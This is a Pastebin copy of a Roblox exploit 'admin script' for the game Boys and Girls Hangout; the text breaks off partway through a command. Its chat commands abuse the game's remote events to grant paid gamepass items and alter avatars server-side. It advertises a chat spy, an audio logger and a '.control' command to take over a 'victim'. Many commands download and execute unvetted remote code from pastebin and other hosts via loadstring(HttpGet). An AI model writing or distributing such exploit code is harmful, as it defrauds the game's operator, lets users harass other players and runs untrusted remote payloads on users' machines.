Advertisement
kids_on_a_bus

boys and girls admin script

Jan 11th, 2020
16,297
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.52 KB | None | 0 0
  1. -- game link: https://www.roblox.com/games/268066633/Boys-And-Girls-Hangout
  2. -- original thread: https://v3rmillion.net/showthread.php?tid=930696
  3.  
  4. IDFORSPAWNER = 12345678 --change to any gamepass id u made. If not MAKE ONE!!
  5. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "SuperFlyGoldBoombox")
  6. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  7. game:GetService("StarterGui"):SetCore("SendNotification", {
  8. Title = "Broodye's Admin",
  9. Text = "Enjoy! DM for help",
  10. Icon = "rbxassetid://1568235957"})
  11. game:GetService("Players").LocalPlayer.Chatted:Connect(function(msg)
  12. if msg:lower() == ".cmds" then
  13. print[[--
  14. -------------------------ADMIN BY Broodye#4786-------------------------
  15. .glock --gun that shoots
  16. .largemachinegun --gun that shoots
  17. .machinegun --gun that shoots
  18. .m24r --gun that shoots
  19. .uzi --gun that shoots
  20. .rtx --some admin
  21. .p --give you a penis
  22. .anchor --anchors you where you are (for annoying new users that like to fling)
  23. .unanchor --unanchors you so u can move around
  24. .control (playernamehere) --lets you control your victim (r6 needed)
  25. .size (number) --lets you change your size
  26. .ff --forcefield body
  27. .load --makes a loading. .. ... rp name
  28. .audio --audio logger
  29. .rhead --rainbow head
  30. .infj --gives you infinate jump
  31. .uninfj --disables infinate jump
  32. .head --remove head
  33. .ffhead --forcefields your head
  34. .fftorso --forcefields your torso
  35. .ffarms --forcefields your arms
  36. .fflegs --forcefields your legs
  37. .black --makes your character black
  38. .white --makes your character white
  39. .red --makes your character red
  40. .orange --makes your character orange
  41. .green --makes your character green
  42. .blue --makes your character blue
  43. .purple --makes your character purple
  44. .legs --removes legs
  45. .arms --removes arms
  46. .torso --removes torso
  47. .invis --makes your whole body invincible (edit the accessories to yours)
  48. .vis -- makes your character visible
  49. .rnametag --removes your VIP nametag
  50. .cooleyes --rainbow eyes
  51. .beast --gives you a rainbow beastmode face
  52. .militaryvehicle --vehicle (r6 reccomended)
  53. .admin --Infinate Yield
  54. .delta --delta admin
  55. .plane --a huge plane
  56. .cloud --gives cloud
  57. .stroller --gives stroller
  58. .blunt --gives you a blunt
  59. .noob --makes you a giant noob (r6 reccomended)
  60. .spy --chat spy
  61. .body --rainbow body
  62. re --reset
  63. .rj --rejoin
  64. ]]
  65. end
  66. if msg:lower() == ".blunt" then
  67. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  68. wait()
  69. loadstring(game:HttpGet("https://pastebin.com/raw/AKASDfGr"))()
  70. end
  71. game:GetService("UserInputService").JumpRequest:connect(function()
  72. if InfiniteJumpEnabled then
  73. game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
  74. end
  75. end)
  76. if msg:lower() == ".infj" then
  77. InfiniteJumpEnabled = true
  78. end
  79. if msg:lower() == ".uninfj" then
  80. InfiniteJumpEnabled = false
  81. end
  82. if msg:lower() == ".stroller" then
  83. game.Workspace.GiveTool:FireServer("IDFORSPAWNER", "Stroller")
  84. end
  85. if msg:lower() == ".glock" then
  86. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  87. wait()
  88. loadstring(game:HttpGet("https://pastebin.com/raw/Jj3Js1VL"))()
  89. end
  90. if msg:lower() == ".boombox" then
  91. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "SuperFlyGoldBoombox")
  92.  
  93. end
  94. if msg:lower() == ".anchor" then
  95. if game:GetService("Players").LocalPlayer.Character then
  96. for _, part in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  97. pcall(function()
  98. part.Anchored = true
  99. end)
  100. end
  101. end
  102. end
  103. if msg:lower() == ".unanchor" then
  104. if game:GetService("Players").LocalPlayer.Character then
  105. for _, part in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants()) do
  106. pcall(function()
  107. part.Anchored = false
  108. end)
  109. end
  110. end
  111. end
  112. if msg:lower() == ".rnametag" then
  113. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  114.  
  115.  
  116. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  117. local Name = "NAME"-- NAME THE TOOL IF WANT
  118. local CE = {} -- DON'T EDIT
  119. local C = { -- DON'T EDIT
  120. workspace = game:GetService("Workspace"),
  121. players = game:GetService("Players")
  122. }
  123. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  124.  
  125.  
  126. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  127. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  128. end
  129.  
  130. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  131.  
  132. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  133. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  134. end
  135. if msg:lower() == ".vis" then
  136. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  137.  
  138.  
  139. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  140. local Name = "NAME"-- NAME THE TOOL IF WANT
  141. local CE = {} -- DON'T EDIT
  142. local C = { -- DON'T EDIT
  143. workspace = game:GetService("Workspace"),
  144. players = game:GetService("Players")
  145. }
  146. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  147.  
  148.  
  149. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  150. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  151. end
  152.  
  153. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  154.  
  155. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  156. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","0")
  157. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","0")
  158. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","0")
  159. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","0")
  160. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","0")
  161. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","0")
  162. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  163. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  164. end
  165. if msg:lower() == ".black" then
  166. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really black"))
  167. end
  168. if msg:lower() == ".white" then
  169. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("White"))
  170. end
  171. if msg:lower() == ".red" then
  172. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really red"))
  173. end
  174. if msg:lower() == ".orange" then
  175. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Deep orange"))
  176. end
  177. if msg:lower() == ".green" then
  178. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Lime green"))
  179. end
  180. if msg:lower() == ".blue" then
  181. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Really blue"))
  182. end
  183. if msg:lower() == ".purple" then
  184. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new(""))
  185. end
  186. if msg:lower() == ".tan" then
  187. game:GetService("ReplicatedStorage").AvatarEditor.BodyColorEvent:FireServer(BrickColor.new("Nougat"))
  188. end
  189. if msg:lower() == ".invis" then
  190. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  191.  
  192.  
  193. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  194. local Name = "NAME"-- NAME THE TOOL IF WANT
  195. local CE = {} -- DON'T EDIT
  196. local C = { -- DON'T EDIT
  197. workspace = game:GetService("Workspace"),
  198. players = game:GetService("Players")
  199. }
  200. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  201.  
  202.  
  203. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  204. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  205. end
  206.  
  207. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  208.  
  209. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  210. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","1")
  211. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","1")
  212. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","1")
  213. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","1")
  214. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","1")
  215. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","1")
  216. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  217. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","")
  218. end
  219. if msg:lower() == ".torso" then
  220. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  221.  
  222.  
  223. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  224. local Name = "NAME"-- NAME THE TOOL IF WANT
  225. local CE = {} -- DON'T EDIT
  226. local C = { -- DON'T EDIT
  227. workspace = game:GetService("Workspace"),
  228. players = game:GetService("Players")
  229. }
  230. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  231.  
  232.  
  233. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  234. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  235. end
  236.  
  237. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  238.  
  239. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  240. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Transparency","1")
  241. end
  242. if msg:lower() == ".arms" then
  243. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  244.  
  245.  
  246. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  247. local Name = "NAME"-- NAME THE TOOL IF WANT
  248. local CE = {} -- DON'T EDIT
  249. local C = { -- DON'T EDIT
  250. workspace = game:GetService("Workspace"),
  251. players = game:GetService("Players")
  252. }
  253. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  254.  
  255.  
  256. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  257. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  258. end
  259.  
  260. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  261.  
  262. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  263. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Transparency","1")
  264. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Transparency","1")
  265. end
  266. if msg:lower() == ".legs" then
  267. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  268.  
  269.  
  270. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  271. local Name = "NAME"-- NAME THE TOOL IF WANT
  272. local CE = {} -- DON'T EDIT
  273. local C = { -- DON'T EDIT
  274. workspace = game:GetService("Workspace"),
  275. players = game:GetService("Players")
  276. }
  277. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  278.  
  279.  
  280. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  281. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  282. end
  283.  
  284. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  285.  
  286. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  287. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Transparency","1")
  288. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Transparency","1")
  289. end
  290. if msg:lower() == ".head" then
  291. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud") -- YOUR GAMEPASS
  292.  
  293.  
  294. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  295. local Name = "NAME"-- NAME THE TOOL IF WANT
  296. local CE = {} -- DON'T EDIT
  297. local C = { -- DON'T EDIT
  298. workspace = game:GetService("Workspace"),
  299. players = game:GetService("Players")
  300. }
  301. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  302.  
  303.  
  304. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  305. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  306. end
  307.  
  308. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  309.  
  310. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW -- DON'T EDIT
  311. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Transparency","1")
  312. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["face"]:Remove())
  313. end
  314. if msg:lower() == ".largemachinegun" then
  315. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  316. wait()
  317. loadstring(game:HttpGet("https://pastebin.com/raw/HRRY3dAf"))()
  318. end
  319. if msg:lower() == ".m24r" then
  320. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  321. wait()
  322. loadstring(game:HttpGet("https://pastebin.com/raw/dyQFawUZ"))()
  323. end
  324. if msg:lower() == ".p" then
  325. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  326. wait()
  327. loadstring(game:HttpGet("https://pastebin.com/raw/vG069WJg"))()
  328. end
  329. if msg:lower() == ".uzi" then
  330. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  331. wait()
  332. loadstring(game:HttpGet("https://pastebin.com/raw/wMpNpbed"))()
  333. end
  334. if msg:lower() == ".load" then
  335. while wait() do
  336. game.Workspace.GuiEvent:FireServer("Loading")
  337. wait(0.5)
  338. game.Workspace.GuiEvent:FireServer("Loading.")
  339. wait(0.5)
  340. game.Workspace.GuiEvent:FireServer("Loading..")
  341. wait(0.5)
  342. game.Workspace.GuiEvent:FireServer("Loading...")
  343. wait(0.5)
  344. end
  345. end
  346. if msg:lower() == ".rtx" then
  347. loadstring(game:HttpGet("https://vtrxgicv.000webhostapp.com/RTX.lua"))()
  348. end
  349. if msg:lower() == ".fflegs" then
  350. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  351. local UserName = game:GetService("Players").LocalPlayer.Name
  352. local Autoride = true
  353. local Name, ToolTip = "KTOOL", "Bodymesh"
  354. local CE = {}
  355. local Variables = {
  356. workspace = game:GetService("Workspace"),
  357. players = game:GetService("Players")
  358. }
  359. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  360.  
  361. function CE:FireEvent(ItemName, Object, Property, Value)
  362. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  363. end
  364.  
  365. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  366. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  367.  
  368. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  369.  
  370. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Material",Enum.Material.ForceField)
  371. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Material",Enum.Material.ForceField)
  372. end
  373. if msg:lower() == ".ffarms" then
  374. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  375. local UserName = game:GetService("Players").LocalPlayer.Name
  376. local Autoride = true
  377. local Name, ToolTip = "KTOOL", "Bodymesh"
  378. local CE = {}
  379. local Variables = {
  380. workspace = game:GetService("Workspace"),
  381. players = game:GetService("Players")
  382. }
  383. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  384.  
  385. function CE:FireEvent(ItemName, Object, Property, Value)
  386. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  387. end
  388.  
  389. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  390. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  391.  
  392. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  393.  
  394. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Material",Enum.Material.ForceField)
  395. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Material",Enum.Material.ForceField)
  396. end
  397. if msg:lower() == ".fftorso" then
  398. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  399. local UserName = game:GetService("Players").LocalPlayer.Name
  400. local Autoride = true
  401. local Name, ToolTip = "KTOOL", "Bodymesh"
  402. local CE = {}
  403. local Variables = {
  404. workspace = game:GetService("Workspace"),
  405. players = game:GetService("Players")
  406. }
  407. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  408.  
  409. function CE:FireEvent(ItemName, Object, Property, Value)
  410. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  411. end
  412.  
  413. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  414. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  415.  
  416. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  417.  
  418. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Material",Enum.Material.ForceField)
  419. end
  420. if msg:lower() == ".ffhead" then
  421. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  422. local UserName = game:GetService("Players").LocalPlayer.Name
  423. local Autoride = true
  424. local Name, ToolTip = "KTOOL", "Bodymesh"
  425. local CE = {}
  426. local Variables = {
  427. workspace = game:GetService("Workspace"),
  428. players = game:GetService("Players")
  429. }
  430. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  431.  
  432. function CE:FireEvent(ItemName, Object, Property, Value)
  433. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  434. end
  435.  
  436. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  437. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  438.  
  439. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  440.  
  441. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Material",Enum.Material.ForceField)
  442. end
  443. if msg:lower() == ".ff" then
  444. game.Workspace.GiveTool:FireServer(IDFORSPAWNER, "PompousTheCloud")
  445. local UserName = game:GetService("Players").LocalPlayer.Name
  446. local Autoride = true
  447. local Name, ToolTip = "KTOOL", "Bodymesh"
  448. local CE = {}
  449. local Variables = {
  450. workspace = game:GetService("Workspace"),
  451. players = game:GetService("Players")
  452. }
  453. local MainUserP, MainUserW = Variables.players.LocalPlayer, Variables.workspace:FindFirstChild(UserName)
  454.  
  455. function CE:FireEvent(ItemName, Object, Property, Value)
  456. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  457. end
  458.  
  459. Variables.workspace.Buy:FireServer(0, "PompousTheCloud")
  460. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  461.  
  462. CE:FireEvent("PompousTheCloud",MainUserW["PompousTheCloud"],"TextureId","rbxassetid://")
  463.  
  464. CE:FireEvent("PompousTheCloud",MainUserW["Head"],"Material",Enum.Material.ForceField)
  465. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Material",Enum.Material.ForceField)
  466. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Material",Enum.Material.ForceField)
  467. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Material",Enum.Material.ForceField)
  468. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Material",Enum.Material.ForceField)
  469. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Material",Enum.Material.ForceField)
  470. end
  471. if msg:lower() == ".audio" then
  472. loadstring(game:HttpGet("https://vtrxgicv.000webhostapp.com/Audio%20Logger.lua"))()
  473. end
  474. if msg:lower() == ".vip" then
  475. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  476. local Name = "NAME"-- NAME THE TOOL IF WANT
  477. local CE = {} -- DON'T EDIT
  478. local C = { -- DON'T EDIT
  479. workspace = game:GetService("Workspace"),
  480. players = game:GetService("Players")
  481. }
  482. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  483.  
  484.  
  485. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  486. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  487. end
  488.  
  489. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  490.  
  491. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  492. while wait() do
  493. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Font","Cartoon")
  494. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"Text","NOTVIP")
  495. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(255,0,0))
  496. wait(.0000000000000000001)
  497. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(75,0,130))
  498. wait(.0000000000000000001)
  499. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(255,165,0))
  500. wait(.0000000000000000001)
  501. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(0,0,255))
  502. wait(.0000000000000000001)
  503. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(0,128,0))
  504. wait(.0000000000000000001)
  505. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(0,128,0))
  506. wait(.0000000000000000001)
  507. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(0,0,255))
  508. wait(.0000000000000000001)
  509. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(255,165,0))
  510. wait(.0000000000000000001)
  511. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextColor3",Color3.new(75,0,130))
  512. wait(.0000000000000000001)
  513. CE:FireEvent("PompousTheCloud",MainUserW["Head"]["NametagTemplate"]["TagText"],"TextStrokeColor3",Color3.new(255,0,0))
  514. wait(.0000000000000000001)
  515. end
  516. end
  517. if msg:lower() == ".rhead" then
  518. loadstring(game:HttpGet("https://vtrxgicv.000webhostapp.com/Rainbow%20head.lua"))()
  519. end
  520. if msg:lower() == ".rage" then
  521. while wait() do
  522. workspace.Face:FireServer("http://www.roblox.com/asset/?id=1392104198")
  523. wait()
  524. workspace.Face:FireServer("http://www.roblox.com/asset/?id=741260810")
  525. wait()
  526. workspace.Face:FireServer("http://www.roblox.com/asset/?id=400818835")
  527. wait()
  528. workspace.Face:FireServer("http://www.roblox.com/asset/?id=606495374")
  529. wait()
  530. workspace.Face:FireServer("http://www.roblox.com/asset/?id=2628286951")
  531. wait()
  532. end
  533. end
  534. if msg:lower() == ".eyes" then
  535. while wait() do
  536. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235875854")
  537. wait()
  538. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235876174")
  539. wait()
  540. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235876570")
  541. wait()
  542. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235877044")
  543. wait()
  544. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235877318")
  545. wait()
  546. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235878653")
  547. wait()
  548. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235878884")
  549. wait()
  550. workspace.Face:FireServer("http://www.roblox.com/asset/?id=3235879197")
  551. end
  552. end
  553. if msg:lower() == ".militaryvehicle" then
  554. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  555. wait()
  556. loadstring(game:HttpGet("https://pastebin.com/raw/wqwdqSDk"))()
  557. end
  558. if msg:lower() == ".fat" then
  559. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  560. local UserName = game:GetService("Players").LocalPlayer.Name -- DON'T EDIT
  561. local Name = "NAME"-- NAME THE TOOL IF WANT
  562. local CE = {} -- DON'T EDIT
  563. local C = { -- DON'T EDIT
  564. workspace = game:GetService("Workspace"),
  565. players = game:GetService("Players")
  566. }
  567. local MainUserP, MainUserW = C.players.LocalPlayer, C.workspace:FindFirstChild(UserName) -- DON'T EDIT
  568.  
  569.  
  570. function CE:FireEvent(ItemName, Object, Property, Value) -- DON'T EDIT
  571. MainUserW:FindFirstChild(ItemName)["ServerControl"]:InvokeServer("SetProperty",{["Value"]=Value,["Property"]=Property,["Object"]=Object})
  572. end
  573.  
  574. C.workspace.Buy:FireServer(0, "PompousTheCloud") -- DON'T EDIT
  575.  
  576. MainUserP["Backpack"]:WaitForChild("PompousTheCloud").Parent = MainUserW
  577. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Shape","Ball")
  578. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Shape","Block")
  579. CE:FireEvent("PompousTheCloud",MainUserW["Torso"],"Size",Vector3.new(2,2,2))
  580. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Shape","Ball")
  581. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Shape","Block")
  582. CE:FireEvent("PompousTheCloud",MainUserW["Right Arm"],"Size",Vector3.new(2,2,2))
  583. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Shape","Ball")
  584. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Shape","Block")
  585. CE:FireEvent("PompousTheCloud",MainUserW["Left Arm"],"Size",Vector3.new(2,2,2))
  586. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Shape","Ball")
  587. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Shape","Block")
  588. CE:FireEvent("PompousTheCloud",MainUserW["Right Leg"],"Size",Vector3.new(2,2,2))
  589. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Shape","Badll")
  590. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Shape","Block")
  591. CE:FireEvent("PompousTheCloud",MainUserW["Left Leg"],"Size",Vector3.new(2,2,2))
  592. CE:FireEvent("PompousTheCloud",MainUserW["Shirt"],"ShirtTemplate","rbxassetid://249458025")
  593. CE:FireEvent("PompousTheCloud",MainUserW["Pants"],"PantsTemplate","rbxassetid://280452751")
  594. end
  595. if msg:lower() == ".admin" then
  596. loadstring(game:HttpGet("https://pastebin.com/raw/tzTXmYf2"))()
  597. end
  598. if msg:lower() == ".delta" then
  599. loadstring(game:HttpGet(('http://genocide.monster/script_source'),true))()
  600. end
  601. if msg:lower() == ".plane" then
  602. game.workspace.GiveTool:FireServer("IDFORSPAWNER", "PompousTheCloud")
  603. wait()
